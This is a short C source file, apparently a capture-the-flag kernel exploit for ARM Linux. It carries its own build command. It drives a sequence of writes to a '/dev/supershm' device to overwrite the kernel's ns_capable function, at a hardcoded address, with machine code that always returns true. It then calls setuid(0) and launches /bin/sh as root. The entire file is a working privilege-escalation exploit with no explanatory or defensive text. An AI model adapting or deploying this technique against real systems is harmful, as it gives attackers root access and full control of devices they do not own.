// arm-linux-gnueabihf-gcc -static -nostdlib  -mcpu=arm926ej-s -marm -O3 exp.c sc.S -o exp

// Yup, kernel code is writable on ARM.
void *ns_capable = (void *) 0xC002738C;
char return_true[] = "\x01\x00\xA0\xE3\x1E\xFF\x2F\xE1";

int write(int fd, void *buf, unsigned long count);
int open(const char *pathname, int flags, int mode);
void exit(int status);
int execve(char *filename, char *const argv[], char *const envp[]);
int setuid(int uid);

char buf[] = "cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXX\x01\x00";

char *args[] = { "/bin/sh", 0 };

void _start(void) {
  int fd = open("/dev/supershm", 1, 0);
  write(fd, "c1", 2);
  write(fd, "c2", 2);
  write(fd, "d1", 2);

  *(void **) (buf + 33) = ns_capable;
  write(fd, buf, sizeof(buf));

  write(fd, "u2", 2);

  write(fd, return_true, sizeof(return_true));
  setuid(0);
  execve(args[0], args, 0);
  exit(0);
}